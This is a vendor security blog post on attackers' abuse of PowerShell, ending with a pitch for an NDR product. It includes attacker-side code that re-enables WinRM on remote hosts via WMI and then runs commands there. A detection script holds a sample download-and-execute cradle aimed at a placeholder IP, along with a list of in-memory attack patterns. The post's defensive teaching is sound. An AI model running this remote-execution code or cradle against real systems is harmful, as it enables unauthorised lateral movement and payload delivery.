PowerShell: A Handy Tool for Conducting Digital Attacks
Any attacker worth their salt knows that unfamiliar software can raise a red flag with network monitoring tools or endpoint management products. That's why they're increasingly turning to "living off the land" (LotL) techniques, which abuse tools and native software already present on the victim's systems so that their activity blends in with legitimate administration and evades detection. One of the tools most widely used for LotL attacks is PowerShell, which ships with every supported version of Windows.
In this blog post I will describe why PowerShell is such a convenient tool for malicious actors and give some examples of how they abuse it. I'll then show that these attacks are on the rise and explain how a Network Detection and Response (NDR) tool can help defend against them.
PowerShell – A Primer
PowerShell is a native Windows command-line shell and scripting language commonly used by system administrators. Because it ships with Windows and its binaries are signed by Microsoft, it is trusted by default: application allow-listing and antivirus products rarely flag powershell.exe itself. Like other shells, PowerShell lets users work with the file system, but it extends that same easy access to other parts of Windows, including the registry, the certificate stores, WMI and the whole .NET Framework. One caveat is worth stating plainly: PowerShell does not grant any privilege the user lacks; it runs with the rights of whoever launched it. What it gives an attacker is a trusted, scriptable interface to everything that account can already do, and when that account is an administrator, that is effectively the entire OS.
What's more, PowerShell can be run remotely through the Windows Remote Management (WinRM) service, which is what PowerShell remoting (Invoke-Command, Enter-PSSession) uses over TCP 5985 (HTTP) or 5986 (HTTPS). Because these are legitimate management ports, they are frequently already allowed through host and network firewalls, so a threat actor holding valid credentials can run scripts on other machines, for example to stage and install malware, without having to break through anything. Even if WinRM is turned off, an attacker with administrative rights on the target can turn it back on using Windows Management Instrumentation (WMI) with a single line of code, because WMI's Win32_Process class can start any command line on the remote host, including the one that enables remoting.
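The remoting path just described, shown from both sides as an added example (this is not code from the original post or from Lastline). It assumes you hold a local-administrator credential for the target, that DCOM (TCP 135 plus the dynamic RPC range) is reachable, and that Windows PowerShell 5.1 is available; the host name server01 is a placeholder. The defender-side function only inspects the machine it runs on, so that part runs anywhere.

```powershell
#Requires -Version 5.1
# Added example, not from the original post: WinRM re-enabled through WMI, then
# used, and the local check a defender runs to see what is exposed. Assumes an
# admin credential on the target; 'server01' is a placeholder host name.

# Attacker's view: WMI rides on DCOM, not WinRM, so it works while WinRM is off.
# Win32_Process.Create runs the command line as the caller, which is why this
# needs admin rights on the target. The spawned powershell.exe is logged with
# WmiPrvSE.exe as its parent process, which is the thing to alert on.
function Enable-RemotingViaWmi {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][pscredential]$Credential
    )
    $cmd  = 'powershell.exe -NoProfile -Command "Enable-PSRemoting -Force -SkipNetworkProfileCheck"'
    $dcom = New-CimSessionOption -Protocol Dcom
    $session = New-CimSession -ComputerName $Target -Credential $Credential -SessionOption $dcom
    try {
        # ReturnValue 0 means the process was created on the remote host
        Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create `
            -Arguments @{ CommandLine = $cmd }
    } finally {
        Remove-CimSession $session
    }
}

# ...and then use the listener that just came up.
function Invoke-RemoteProbe {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][pscredential]$Credential
    )
    Invoke-Command -ComputerName $Target -Credential $Credential -ScriptBlock {
        [pscustomobject]@{
            Host      = $env:COMPUTERNAME
            User      = "$env:USERDOMAIN\$env:USERNAME"
            PSVersion = $PSVersionTable.PSVersion.ToString()
        }
    }
}

# Defender's view: what this host exposes over WinRM right now.
function Get-WinRmExposure {
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $listeners = @()
    if ($svc -and $svc.Status -eq 'Running') {
        # The WSMan: drive is only mounted while the service is running
        $listeners = Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue | ForEach-Object {
            $p = Get-ChildItem -Path $_.PSPath
            [pscustomobject]@{
                Transport = ($p | Where-Object Name -eq 'Transport').Value
                Address   = ($p | Where-Object Name -eq 'Address').Value
                Port      = ($p | Where-Object Name -eq 'Port').Value
            }
        }
    }
    [pscustomobject]@{
        Service      = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
        StartType    = if ($svc) { $svc.StartType.ToString() } else { $null }
        Listeners    = @($listeners)
        TrustedHosts = (Get-Item -Path WSMan:\localhost\Client\TrustedHosts -ErrorAction SilentlyContinue).Value
    }
}

Get-WinRmExposure | Format-List

# Attacker side, once a credential is in hand:
# $cred = Get-Credential
# Enable-RemotingViaWmi -Target 'server01' -Credential $cred
# Invoke-RemoteProbe   -Target 'server01' -Credential $cred
```

A StartType of Automatic with an HTTP listener bound to * on a workstation is worth questioning; workstations rarely need to accept remoting at all. The WMI-driven enable leaves a Security 4688 event (if process auditing is on) whose parent is WmiPrvSE.exe and whose command line contains Enable-PSRemoting, plus the WinRM service changing to Running in the System log; both are cheap, high-signal detections.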
How Digital Attackers Abuse PowerShell
What are some of the common ways PowerShell can be abused by an attacker? While this is by no means an exhaustive list, here are some examples:
- Using macros inside Office attachments to execute malicious PowerShell commands: Seeing a phishing or malicious email with a Microsoft Office file attachment is neither new nor novel. In some of the attempted attacks we've seen in recent months, attackers embed PowerShell in the macros inside these files; when the macro runs, it launches powershell.exe in the background to execute commands or to fetch and run a script. Sometimes the attachment is instead an Internet Query (IQY) file, a small text file that tells Excel to pull data from a URL. Back in August 2018, for instance, Malware.News reported that digital attackers had begun using IQY attachments in conjunction with Excel's Dynamic Data Exchange (DDE) feature to target Japanese users with BEBLOH or URSNIF malware.
- Injecting malicious code into memory: "Fileless" attacks continue to increase, and attackers often use PowerShell as their weapon of choice to load malware directly into memory, typically by downloading a script or .NET assembly and executing it from a string or byte array rather than from a file. This has been very successful against traditional antivirus software, which watches files written to disk, because little or nothing is ever written there. Cynet reported on this activity in a Sodinokibi ransomware attack back in August 2019.
- Installing services: A Windows service is a program that runs in the background, out of the end user's view, and is typically configured to start when Windows boots. We've seen some successful attacks where malicious PowerShell scripts are installed as Windows services and are then used to install other malicious software. Thankfully this is still relatively rare, but watching for new services on your endpoints (Event ID 7045 in the System log records every service installation) is a good way to catch something before it becomes a major issue.
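A small hunt for the three patterns above, as an added example that is not part of the original post. It runs over constructed sample records so it works offline; the host paths, service name, IP address and base64 fragments in the samples are made up for illustration. The ConvertFrom-WinEvent helper shows how real records from Get-WinEvent are flattened into the same shape. Note the telemetry each rule needs: 4688 with a command line requires "Audit Process Creation" plus "Include command line in process creation events", 4104 requires script block logging, and 7045 is on by default.

```powershell
#Requires -Version 5.1
# Added example, not from the original post: detection logic for Office-spawned
# PowerShell, in-memory download cradles and PowerShell-backed services, run over
# constructed sample records. All sample values below are invented.

# Flatten a Windows event into @{ Id; Time; Data = @{ <field name> = <value> } } using the
# named <Data> elements in the event XML, so no positional Properties indices are needed.
function ConvertFrom-WinEvent {
    param([Parameter(Mandatory, ValueFromPipeline)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    process {
        $xml  = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        @{ Id = $Event.Id; Time = $Event.TimeCreated; Data = $data }
    }
}

# Indicators of an encoded command, a download cradle or reflective loading in script text.
$InMemoryPatterns = @(
    'FromBase64String', 'Invoke-Expression', '\bIEX\b', 'DownloadString', 'DownloadData',
    'Reflection\.Assembly\]::Load', 'VirtualAlloc', '-EncodedCommand', '\s-enc?\s'
)
$OfficeParents   = 'WINWORD\.EXE|EXCEL\.EXE|POWERPNT\.EXE|OUTLOOK\.EXE'
$PowerShellImage = 'powershell(_ise)?\.exe|pwsh\.exe'

function Find-PowerShellAbuse {
    param([Parameter(Mandatory, ValueFromPipeline)][hashtable]$Record)
    process {
        $d   = $Record.Data
        $hit = $null
        switch ($Record.Id) {
            4688 {  # Security: process creation
                if ($d.NewProcessName -match $PowerShellImage -and $d.ParentProcessName -match $OfficeParents) {
                    $hit = "Office process $($d.ParentProcessName) spawned PowerShell: $($d.CommandLine)"
                }
            }
            4104 {  # Microsoft-Windows-PowerShell/Operational: de-obfuscated script block text
                $m = $InMemoryPatterns | Where-Object { $d.ScriptBlockText -match $_ }
                if ($m) { $hit = "Script block matched $($m -join ', ')" }
            }
            7045 {  # System: a new service was installed
                if ($d.ImagePath -match $PowerShellImage -or $d.ImagePath -match '-enc') {
                    $hit = "Service '$($d.ServiceName)' runs PowerShell: $($d.ImagePath)"
                }
            }
        }
        if ($hit) { [pscustomobject]@{ EventId = $Record.Id; Time = $Record.Time; Finding = $hit } }
    }
}

# Constructed sample records (not real telemetry): one per rule, plus a benign script block.
$samples = @(
    @{ Id = 4688; Time = '2019-09-01T10:00:01'; Data = @{
        NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine       = 'powershell -w hidden -enc SQBFAFgA' } }
    @{ Id = 4104; Time = '2019-09-01T10:00:02'; Data = @{
        ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/stage2")' } }
    @{ Id = 7045; Time = '2019-09-01T10:00:03'; Data = @{
        ServiceName = 'WinUpdateSvc'
        ImagePath   = 'powershell.exe -NoP -W Hidden -enc UwB0AGEAcgB0AC0A' } }
    @{ Id = 4104; Time = '2019-09-01T10:00:04'; Data = @{
        ScriptBlockText = 'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB' } }
)

$samples | Find-PowerShellAbuse | Format-Table -AutoSize   # three findings, benign line dropped

# Live data, same pipeline:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ConvertFrom-WinEvent | Find-PowerShellAbuse
```

The 4104 rule is the one that survives obfuscation: script block logging records the code after the engine has decoded and expanded it, so a base64 blob passed on the command line shows up here as the plain IEX/DownloadString it was hiding. Expect tuning on the 4688 rule, since some legitimate add-ins do launch PowerShell from Office.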
PowerShell Attacks on the Rise
The bottom line here is simple: attacks involving PowerShell are on the rise. Dark Reading reported a 432% increase in PowerShell malware between 2016 and 2017, and Homeland Security Today described an even bigger jump in malicious PowerShell activity, 661%, between mid-2017 and mid-2018.
It's obvious to me that an important part of your security strategy going forward must include the ability to defend against malicious use of PowerShell. One of the strongest measures is to block the shell entirely for users and systems that don't need it, for example with AppLocker or Windows Defender Application Control (removing it outright is not practical, since Windows components depend on it). Where you do need it, remove the features you're not using, above all the legacy PowerShell 2.0 engine, which has none of the modern logging and is the classic downgrade target, and keep the version in use current so that script block logging and the Antimalware Scan Interface (AMSI) integration introduced in PowerShell 5 are in play. Of course, none of that prevents an attack if an end user opens something they shouldn't have and lets malicious PowerShell gain a foothold.
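The hardening steps above as an added example, not code from the original post or from Lastline: it enables the logging the engine offers, removes the 2.0 engine, and reports the resulting state. The registry paths are the ones the PowerShell Group Policy templates write; C:\PSTranscripts is an assumed placeholder, and the script must run elevated.

```powershell
#Requires -Version 5.1
#Requires -RunAsAdministrator
# Added example, not from the original post. Registry paths are those used by the
# PowerShell Group Policy templates; C:\PSTranscripts is an assumed placeholder.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')  # in production: a write-only share users cannot read back
    $sb = Join-Path $PolicyRoot 'ScriptBlockLogging'
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    $tr = Join-Path $PolicyRoot 'Transcription'
    foreach ($key in $sb, "$ml\ModuleNames", $tr) { New-Item -Path $key -Force | Out-Null }
    # Event ID 4104 in Microsoft-Windows-PowerShell/Operational: the de-obfuscated script block text
    Set-ItemProperty -Path $sb -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # Event ID 4103: pipeline execution details for every module ('*' = all)
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$ml\ModuleNames" -Name '*' -Value '*' -Type String
    # Over-the-shoulder transcripts of every session, with an invocation header per command
    Set-ItemProperty -Path $tr -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name OutputDirectory -Value $TranscriptDir -Type String
}

# The 2.0 engine has none of the logging above and no AMSI hook, so 'powershell -Version 2'
# is the classic downgrade; remove it wherever it is still installed.
function Disable-PowerShellV2 {
    if (Get-Command Uninstall-WindowsFeature -ErrorAction SilentlyContinue) {
        Uninstall-WindowsFeature -Name PowerShell-V2                                           # Windows Server
    } else {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart  # Windows 10/11
    }
}

function Test-PowerShellHardening {
    $sb = Get-ItemProperty -Path (Join-Path $PolicyRoot 'ScriptBlockLogging') -ErrorAction SilentlyContinue
    $ml = Get-ItemProperty -Path (Join-Path $PolicyRoot 'ModuleLogging')      -ErrorAction SilentlyContinue
    $tr = Get-ItemProperty -Path (Join-Path $PolicyRoot 'Transcription')      -ErrorAction SilentlyContinue
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    # LanguageMode stays FullLanguage unless an AppLocker/WDAC policy forces ConstrainedLanguage for untrusted scripts
    [pscustomobject]@{
        EngineVersion      = $PSVersionTable.PSVersion.ToString()
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode.ToString()
        ScriptBlockLogging = [bool]$sb.EnableScriptBlockLogging
        ModuleLogging      = [bool]$ml.EnableModuleLogging
        Transcription      = [bool]$tr.EnableTranscripting
        TranscriptDir      = $tr.OutputDirectory
        V2EngineState      = if ($v2) { $v2.State.ToString() } else { 'NotPresent' }
    }
}

Enable-PowerShellLogging
Disable-PowerShellV2
Test-PowerShellHardening | Format-List
```

Run Test-PowerShellHardening on its own first to get a baseline; after the other two functions, ScriptBlockLogging, ModuleLogging and Transcription should read True and V2EngineState should no longer be Enabled (a reboot may be needed on Windows 10/11). Keep in mind that these are local registry writes; in a domain the same keys should come from Group Policy so a local administrator, or an attacker who becomes one, cannot quietly switch them back off.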
That’s where Lastline Defender comes in. This NDR platform monitors and blocks malicious behaviors on the network associated with PowerShell. Not only that, but Lastline also uses file analysis to analyze script execution behavior, thereby identifying obfuscation and evasion techniques used. In either case, you’re covered: if Lastline Defender can see the original artifact that came in, it will detect the anomalous use of PowerShell and alert your SOC to the event. If the artifact wasn’t seen (for example if the device was off-network at the time), Lastline Defender will detect the malicious activity of the artifact the moment it does something off the device (call home, download another malicious payload, move laterally inside your network, etc.).